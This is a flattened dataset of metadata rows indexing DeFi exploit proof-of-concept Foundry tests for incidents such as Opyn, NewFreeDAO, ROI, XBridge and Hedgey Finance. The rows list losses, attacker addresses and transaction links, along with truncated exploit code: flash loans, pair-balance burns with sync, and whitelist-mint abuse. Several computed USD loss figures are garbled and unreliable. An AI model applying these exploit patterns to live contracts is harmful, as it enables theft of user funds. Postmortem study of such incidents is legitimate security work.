2026-01-07T10:59:16.525743
postmortems
ethereum
10,307,563
null
null
null
null
null
null
null
null
false
false
true
medium
null
access-control
function testsafeTransfer() public { emit log_named_uint( "Victim XBPToken Allowance to Bancor Contract : ", (XBPToken.allowance(victim, bancorAddress) / 1 ether) ); emit log_named_uint("[Before Attack]Victim XBPToken Balance : ", (XBPToken.balanceOf(victim)) / 1 ether); emit...
true
Unknown
4.11
low
Bancor Exploit (2020-06)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.17; import "forge-std/Test.sol"; import "./../interface.sol"; /* @Analysis https://medium.com/opyn/opyn-eth-put-exploit-post-mortem-1a009e3347a8 @Transaction 0x56de6c4bd906ee0c067a332e64966db8b1e866c7965c044163a503de6ee6552a*/ contract ContractTest is Test...
exploit_poc
Opyn
2020-08
Opyn_exp.sol
null
91bc667000fa78dd
2026-01-07T10:59:16.525784
postmortems
unknown
10,592,516
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
function test_attack() public { cheats.startPrank(attacker); uint256 balBefore = usdc.balanceOf(attacker) / 1e6; console.log("Attacker USDC balance before is ", balBefore); console.log("------EXPLOIT-----"); //Adds ERC20 collateral, and mints new oTokens in one step ...
true
Unknown
2.96
low
Opyn Exploit (2020-08)
false
false
false
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; interface ISDF { function burn(address, uint256) external; function balanceOf( address owner ) external view returns (uint256); function approve(address spender, uint256 value) external returns (bool); } interf...
exploit_poc
Shadowfi
2022-09
Shadowfi_exp.sol
null
6b3a6198cec875cb
2026-01-07T10:59:16.525826
postmortems
unknown
20,969,095
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { emit log_named_decimal_uint("[Start] Attacker WBNB balance before exploit", WBNB.balanceOf(address(this)), 18); address(WBNB).call{value: 0.01 ether}(""); WBNBToSDF(); SDF.burn(address(Pair), SDF.balanceOf(address(Pair)) - 1); Pair.sync(); ...
true
Unknown
3.03
low
Shadowfi Exploit (2022-09)
false
false
false
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; interface IWRAP { function withdraw(address from, address to, uint256 amount) external; } interface IDODO { function flashLoan(uint256 baseAmount, uint256 quoteAmount, address assetTo, bytes calldata data) external; funct...
exploit_poc
RADT
2022-09
RADT_exp.sol
flash_loan
264146bed1455381
2026-01-07T10:59:16.525862
postmortems
unknown
21,572,418
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
function testExploit() public { emit log_named_decimal_uint("[Start] Attacker USDT balance before exploit", USDT.balanceOf(address(this)), 18); USDT.approve(address(Router), ~uint256(0)); RADT.approve(address(Router), ~uint256(0)); IDODO(dodo).flashLoan(0, 200_000 * 1e18, address(this),...
true
Unknown
4.28
low
RADT Exploit (2022-09)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : 4481 BNB (~125M US$) // Attacker : 0x22c9736d4fc73a8fa0eb436d2ce919f5849d6fd2 // Attack Contract : 0xa35ef9fa2f5e0527cb9fbb6f9d3a24cfed948863 // Vulnerable Contract : 0x...
exploit_poc
NewFreeDAO
2022-09
NewFreeDAO_exp.sol
flash_loan
2720d8d5e3f5a39e
2026-01-07T10:59:16.525916
postmortems
unknown
21,140,434
4481 BNB (~125M US$)
4,481,000,000,000
null
null
null
null
null
null
true
true
true
critical
4481 BNB (~125M US$)
flash-loan
function testExploit() public { console.log("Flashloan 250 WBNB from DODO DLP..."); bytes memory data = abi.encode(dodo, wbnb, 250 * 1e18); DVM(dodo).flashLoan(0, 250 * 1e18, address(this), data); }
true
4481 BNB (~125M US$)
$4481000.00M
8
high
NewFreeDAO Exploit (2022-09)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; /* Bad Guys by RPF Business Logic Flaw Exploit PoC The exploit was due to the missing check for "chosenAmount" in the WhiteListMint function which allowed the attacker to pass the number of NFTs h...
exploit_poc
BadGuysbyRPF
2022-09
BadGuysbyRPF_exp.sol
null
f56a441e2d2df6d5
2026-01-07T10:59:16.526031
postmortems
ethereum
15,460,093
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { //quick hack to enable Minting in Block#15460093 //In actual hack the Mint was live in Block#15460094 cheats.prank(owner); RPFContract.flipPauseMinting(); console.log("[Before WhiteListMint] Attacker's Bad Guys by RPF NFT Balance: ", RPFContract.b...
true
Unknown
3.61
low
BadGuysbyRPF Exploit (2022-09)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // Exploit Alert ref: https://twitter.com/blocksecteam/status/1567027459207606273?s=21&t=ZNoZgSdAuI4dJIFlMaTJeg // Origin Attack Transaction: 0xe176bd9cfefd40dc03508e91d856bd1fe72ffc1e9260cd63502d...
exploit_poc
ZoomproFinance
2022-09
ZoomproFinance_exp.sol
flash_loan
cc0159d2b8782a89
2026-01-07T10:59:16.526078
postmortems
unknown
21,055,930
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
function testExploit() public { emit log_named_decimal_uint("[Start] Attacker WBNB balance before exploit", Usdt.balanceOf(address(this)), 18); // flashloan - Brrow 3,000,000 USDT PancakePair.swap(3_000_000_000_000_000_000_000_000, 0, address(this), new bytes(1)); emit log_named_decima...
true
Unknown
5.12
medium
ZoomproFinance Exploit (2022-09)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; /** * POC Build by * - https://twitter.com/kayaba2002 * - https://twitter.com/eugenioclrc */ interface Structs { struct Val { uint256 value; } enum ActionType { Dep...
exploit_poc
MEVbadc0de
2022-09
MEVbadc0de_exp.sol
null
60b8d13a9d8a2540
2026-01-07T10:59:16.526139
postmortems
unknown
15,625,424
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { emit log_named_decimal_uint("MEV Bot balance before exploit:", weth.balanceOf(MEVBOT), 18); Structs.Info[] memory _infos = new Structs.Info[](1); _infos[0] = Structs.Info({owner: address(this), number: 1}); Structs.ActionArgs[] memory _args = new Structs...
true
Unknown
5
medium
MEVbadc0de Exploit (2022-09)
false
false
false
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; interface TargetClaim { function claim( address ) external; } interface TargetWithdraw { function withdrawReturnAmountByMerchant() external; function withdrawReturnAmountByConsumer() external; function with...
exploit_poc
Yyds
2022-09
Yyds_exp.sol
null
16dd352491806d51
2026-01-07T10:59:16.526202
postmortems
unknown
21,157,025
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { emit log_named_decimal_uint("[Start] Attacker USDT balance before exploit", USDT.balanceOf(address(this)), 18); (reserve0, reserve1,) = Pair.getReserves(); uint256 amount0Out = USDT.balanceOf(address(Pair)); Pair.swap(amount0Out - 1 * 1e18, 0, address(thi...
true
Unknown
3.26
low
Yyds Exploit (2022-09)
false
false
false
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; interface IPair { function approve(address, uint256) external; function balanceOf( address ) external returns (uint256); } interface IDPC { function approve(address, uint256) external; function balanceOf( ...
exploit_poc
DPC
2022-09
DPC_exp.sol
null
78cdd633afacee3f
2026-01-07T10:59:16.526249
postmortems
unknown
21,179,209
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
false
Unknown
1.71
low
DPC Exploit (2022-09)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // Total Lost : 40085 USDT // Attacker : 0x81c63d821b7cdf70c61009a81fef8db5949ac0c9 // Attack Contract : 0x4e77df7b9cdcecec4115e59546f3eacba095a89f // Vulnerable Contract : https://bscscan.com/ad...
exploit_poc
BXH
2022-09
BXH_exp.sol
flash_loan
2a4e1735715051ff
2026-01-07T10:59:16.526299
postmortems
bsc
21,727,289
40085 USDT
40,085
null
null
https://bscscan.com/address/0x27539b1dee647b38e1b987c41c5336b1a8dce663
null
null
null
false
false
true
medium
40085 USDT
flash-loan
function testExploit() public { // Before attack need deposit first // cheat.rollFork(21665464); // cheat.prank(0x81C63d821b7CdF70C61009A81FeF8Db5949AC0C9); // //emit log_named_decimal_uint("[Start] VUSDT Balance Of 0x54f611135A9b88bbE23a8CF6C1310c59321F2717:", vUSDT.balanceOf(address...
true
https://bscscan.com/address/0x27539b1dee647b38e1b987c41c5336b1a8dce663
$40.1K
9
high
BXH Exploit (2022-09)
true
true
false
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; interface MEVBot { function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external; } contract ContractTest is Test { address public _token0; address public _token1; IERC20 USDT = I...
exploit_poc
BNB48MEVBot
2022-09
BNB48MEVBot_exp.sol
null
4f52d3507a4f9f4b
2026-01-07T10:59:16.526375
postmortems
unknown
21,297,409
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { emit log_named_decimal_uint("[Start] Attacker USDT balance before exploit", USDT.balanceOf(address(this)), 18); emit log_named_decimal_uint("[Start] Attacker WBNB balance before exploit", WBNB.balanceOf(address(this)), 18); emit log_named_decimal_uint("[Start] Att...
true
Unknown
3.59
low
BNB48MEVBot Exploit (2022-09)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://medium.com/nereus-protocol/post-mortem-flash-loan-exploit-in-single-nxusd-market-343fa32f0c6 // Refer: https://github.com/kedao/exploitDefiLabs/blob/main/src/test/Nxusd_exp...
exploit_poc
NXUSD
2022-09
NXUSD_exp.sol
flash_loan
7985b988a0b53147
2026-01-07T10:59:16.526418
postmortems
unknown
19,613,451
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { USDC.approve(address(Router), type(uint256).max); WAVAX.approve(address(Router), type(uint256).max); // AAVE flashloan aaveLendingPool.flashLoan(address(this), _assets, _amounts, _modes, address(this), new bytes(1), 0); emit log_named_uint("After ...
true
Unknown
6
medium
NXUSD Exploit (2022-09)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : 157.98 BNB (~44,000 US$) // Attacker : 0x91b7f203ed71c5eccf83b40563e409d2f3531114 // Attack Contract : 0x158af3d23d96e3104bcc65b76d1a6f53d0f74ed0 // Vulnerable Contract ...
exploit_poc
ROI
2022-09
ROI_exp.sol
flash_loan
bfa324da015c15ca
2026-01-07T10:59:16.526483
postmortems
bsc
21,143,795
157.98 BNB (~44,000 US$)
157,980,000,000
null
null
https://bscscan.com/address/0xe48b75dc1b131fd3a8364b0580f76efd04cf6e9c#code
null
null
null
true
false
true
critical
157.98 BNB (~44,000 US$)
flash-loan
function testExploit() public { emit log_named_decimal_uint("[Start] Attacker BNB Balance:", address(this).balance, 18); console.log("----------------------------------------------------"); console.log("Attacker swap some BNB to ROI for attack fund..."); console.log("Before [WBNB, BUSD,...
true
157.98 BNB (~44,000 US$)
https://bscscan.com/address/0xe48b75dc1b131fd3a8364b0580f76efd04cf6e9c#code
$157980.00M
9
high
ROI Exploit (2022-09)
true
true
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; interface IERC721Receiver { function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) external returns (bytes4); } ...
exploit_poc
THB
2022-09
THB_exp.sol
null
2bec26f07f8c4449
2026-01-07T10:59:16.526569
postmortems
unknown
21,785,004
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { emit log_named_uint("Attacker THBR balance before exploit", THBR.balanceOf(address(this))); houseWallet.shoot{value: 0.32 ether}(randomNumber, gameId, feestate, _x, name, _add, nftcheck, dystopianCheck); uint256 _amount = houseWallet.winners(gameId, add); ...
true
Unknown
3.51
low
THB Exploit (2022-09)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // TX : https://app.blocksec.com/explorer/tx/bsc/0xee10553c26742bec9a4761fd717642d19012bab1704cbced048425070ee21a8a?line=2 // Profit : ~182K USD // REASON : Business Logic Flaw // Sandwitch atta...
exploit_poc
ATM
2024-04
ATM_exp.sol
null
3e3556831795db22
2026-01-07T10:59:16.526619
postmortems
unknown
37,483,300
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
false
Unknown
1.94
low
ATM Exploit (2024-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "forge-std/Test.sol"; import "src/test/interface.sol"; // @KeyInfo - Total Lost : 181K // Attacker : https://arbiscan.io/address/0x1abe06f451e2d569b3e9123baf33b51f68878656 // Attack Contract : https://arbiscan.io/address/0xd775fd7b76424a553e4adce6...
exploit_poc
Yield
2024-04
Yield_exp.sol
flash_loan
f85c1993c0b3d94e
2026-01-07T10:59:16.526666
postmortems
arbitrum
null
181K
181,000
https://arbiscan.io/address/0x1abe06f451e2d569b3e9123baf33b51f68878656
https://arbiscan.io/address/0xd775fd7b76424a553e4adce6c2f99be419ce8d41
https://arbiscan.io/address/0x3b4ffd93ce5fcf97e61aa8275ec241c76cc01a47
https://arbiscan.io/tx/0x6caa65b3fc5c8d4c7104574c3a15cd6208f742f9ada7d81ba027b20473137705
null
null
true
true
true
high
181K
flash-loan
function testExploit() public { // Implement exploit code here address[] memory tokens = new address[](1); tokens[0] = address(USDC); uint256[] memory amounts = new uint256[](1); amounts[0] = 400_000 * 1e6; bytes memory userData = ""; Balancer.flashLoan(address(th...
true
181K
https://arbiscan.io/address/0x1abe06f451e2d569b3e9123baf33b51f68878656
https://arbiscan.io/address/0xd775fd7b76424a553e4adce6c2f99be419ce8d41
https://arbiscan.io/address/0x3b4ffd93ce5fcf97e61aa8275ec241c76cc01a47
https://arbiscan.io/tx/0x6caa65b3fc5c8d4c7104574c3a15cd6208f742f9ada7d81ba027b20473137705
$181.0K
8.83
high
Yield Exploit (2024-04)
true
true
true
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~0.3 ETH // TX : https://app.blocksec.com/explorer/tx/eth/0x6fb7f8e9eb09d6ae17dbe82b2b42f46f64fb9c3197438b68ecf03e832d5fc791 // Attacker : https://etherscan.io/address/0x676c3262e8f0fba0031a93ea74ff801b99ac1...
exploit_poc
HoppyFrogERC
2024-04
HoppyFrogERC_exp.sol
null
0bb815a9dda687ec
2026-01-07T10:59:16.526717
postmortems
ethereum
19,570,744
~0.3 ETH
0.3
https://etherscan.io/address/0x676c3262e8f0fba0031a93ea74ff801b99ac177b
https://etherscan.io/address/0xc976ed4b25e1e7019ff34fb54f4e63b1550b70c3
null
null
null
null
true
false
false
low
~0.3 ETH
unknown
false
https://etherscan.io/address/0x676c3262e8f0fba0031a93ea74ff801b99ac177b
https://etherscan.io/address/0xc976ed4b25e1e7019ff34fb54f4e63b1550b70c3
$0
3.39
low
HoppyFrogERC Exploit (2024-04)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @Analysis // https://twitter.com/Phalcon_xyz/status/1782966566042181957 // @TX // https://app.blocksec.com/explorer/tx/bsc/0x49ca5e188c538b4f2efb45552f13309cc0dd1f3592eee54decfc9da54620c2ec inte...
exploit_poc
YIEDL
2024-04
YIEDL_exp.sol
null
92f37ab3a57eeeee
2026-01-07T10:59:16.526764
postmortems
unknown
38,126,753
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
function testExploit() public { bytes[] memory dataList = new bytes[](11); //@note mock data list - unoswapTo uint256[] memory pools = new uint256[](1); pools[0] = uint256( 28_948_022_309_329_048_857_350_594_136_651_893_637_891_169_795_467_361_725_136_627_244_723_734_772_827 ...
true
Unknown
3.64
low
YIEDL Exploit (2024-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~$1.6M(https://debank.com/profile/0x0cfc28d16d07219249c6d6d6ae24e7132ee4caa7, >200k USD(plus a lot of STC, SRLTY, Mazi tokens)) // Attacker : https://etherscan.io/address/...
exploit_poc
XBridge
2024-04
XBridge_exp.sol
null
3061e72a365cabcc
2026-01-07T10:59:16.526810
postmortems
ethereum
19,723,701
~$1.6M(https://debank.com/profile/0x0cfc28d16d07219249c6d6d6ae24e7132ee4caa7, >200k USD(plus a lot of STC, SRLTY, Mazi tokens))
1,600,000
https://etherscan.io/address/0x0cfc28d16d07219249c6d6d6ae24e7132ee4caa7
null
https://etherscan.io/address/0x354cca2f55dde182d36fe34d673430e226a3cb8c#code
null
null
null
true
true
false
critical
~$1.6M(https://debank.com/profile/0x0cfc28d16d07219249c6d6d6ae24e7132ee4caa7, >200k USD(plus a lot of STC, SRLTY, Mazi tokens))
unknown
function testExploit() public { // First TX deal(address(this), 0.15 ether); emit log_named_decimal_uint("Exploiter STC balance before attack", STC.balanceOf(address(this)), 9); IXbridge.tokenInfo memory base = IXbridge.tokenInfo(address(STC), 85_936); IXbridge.tokenInfo memory ...
true
~$1.6M(https://debank.com/profile/0x0cfc28d16d07219249c6d6d6ae24e7132ee4caa7, >200k USD(plus a lot of STC, SRLTY, Mazi tokens))
https://etherscan.io/address/0x0cfc28d16d07219249c6d6d6ae24e7132ee4caa7
https://etherscan.io/address/0x354cca2f55dde182d36fe34d673430e226a3cb8c#code
$1.60M
6.04
medium
XBridge Exploit (2024-04)
true
true
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // TX : https://app.blocksec.com/explorer/tx/bsc/0xd03702e17171a32464ce748b8797008d59e2dbcecd3b3847d5138414566c886d // Profit : ~ 28K USD // REASON : business logic flaw XD transfer to pair won'...
exploit_poc
UPS
2024-04
UPS_exp.sol
null
ae5d1a76694ad559
2026-01-07T10:59:16.526859
postmortems
unknown
37,680,754
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
false
Unknown
1.61
low
UPS Exploit (2024-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~14 BNB // Attacker : https://bscscan.com/address/0x4645863205b47a0a3344684489e8c446a437d66c // Attack Contract : https://bscscan.com/address/0xde521fbbbb0dbcfa57325a989...
exploit_poc
FIL314
2024-04
FIL314_exp.sol
null
f80e4da09db3bf73
2026-01-07T10:59:16.526903
postmortems
bsc
null
~14 BNB
14,000,000,000
https://bscscan.com/address/0x4645863205b47a0a3344684489e8c446a437d66c
https://bscscan.com/address/0xde521fbbbb0dbcfa57325a9896c34941f23e96a0
https://bscscan.com/address/0xe8a290c6fc6fa6c0b79c9cfae1878d195aeb59af
https://bscscan.com/tx/0x9f2eb13417190e5139d57821422fc99bced025f24452a8b31f7d68133c9b0a6c
null
null
true
false
false
critical
~14 BNB
unknown
function testExploit() public { // Implement exploit code here emit log_named_decimal_uint(" Attacker BNB Balance Before exploit", address(this).balance, 18); // buy FIL314 token address(FIL314).call{value: 0.05 ether}(""); // deflate the token for (uint256 i = 0; i < 600...
true
~14 BNB
https://bscscan.com/address/0x4645863205b47a0a3344684489e8c446a437d66c
https://bscscan.com/address/0xde521fbbbb0dbcfa57325a9896c34941f23e96a0
https://bscscan.com/address/0xe8a290c6fc6fa6c0b79c9cfae1878d195aeb59af
https://bscscan.com/tx/0x9f2eb13417190e5139d57821422fc99bced025f24452a8b31f7d68133c9b0a6c
$14000.00M
6.98
medium
FIL314 Exploit (2024-04)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 48M USD // Attacker : https://etherscan.io/address/0xDed2b1a426E1b7d415A40Bcad44e98F47181dda2 // Attack Contract : https://etherscan.io/address/0xC793113F1548B97E37c409f39...
exploit_poc
HedgeyFinance
2024-04
HedgeyFinance_exp.sol
flash_loan
53b197bc763ff25a
2026-01-07T10:59:16.526944
postmortems
ethereum
null
48M USD
48,000,000
https://etherscan.io/address/0xDed2b1a426E1b7d415A40Bcad44e98F47181dda2
https://etherscan.io/address/0xC793113F1548B97E37c409f39244EE44241bF2b3
https://etherscan.io/address/0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511
https://etherscan.io/tx/0x2606d459a50ca4920722a111745c2eeced1d8a01ff25ee762e22d5d4b1595739
https://medium.com/@CUBE3AI/hedgey-finance-hack-detected-by-cube3-ai-minutes-before-exploit-1f500e7052d4
https://twitter.com/Cube3AI/status/1781294512716820918
true
true
true
critical
48M USD
flash-loan
function testExploit() public { deal(address(this), 0 ether); emit log_named_decimal_uint("Attacker USDC balance before exploit", address(this).balance, 18); address[] memory tokens = new address[](1); tokens[0] = address(USDC); uint256[] memory amounts = new uint256[](1); ...
true
48M USD
https://etherscan.io/address/0xDed2b1a426E1b7d415A40Bcad44e98F47181dda2
https://etherscan.io/address/0xC793113F1548B97E37c409f39244EE44241bF2b3
https://etherscan.io/address/0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511
https://etherscan.io/tx/0x2606d459a50ca4920722a111745c2eeced1d8a01ff25ee762e22d5d4b1595739
https://medium.com/@CUBE3AI/hedgey-finance-hack-detected-by-cube3-ai-minutes-before-exploit-1f500e7052d4
https://twitter.com/Cube3AI/status/1781294512716820918
$48.00M
9.24
high
HedgeyFinance Exploit (2024-04)
true
true
true
true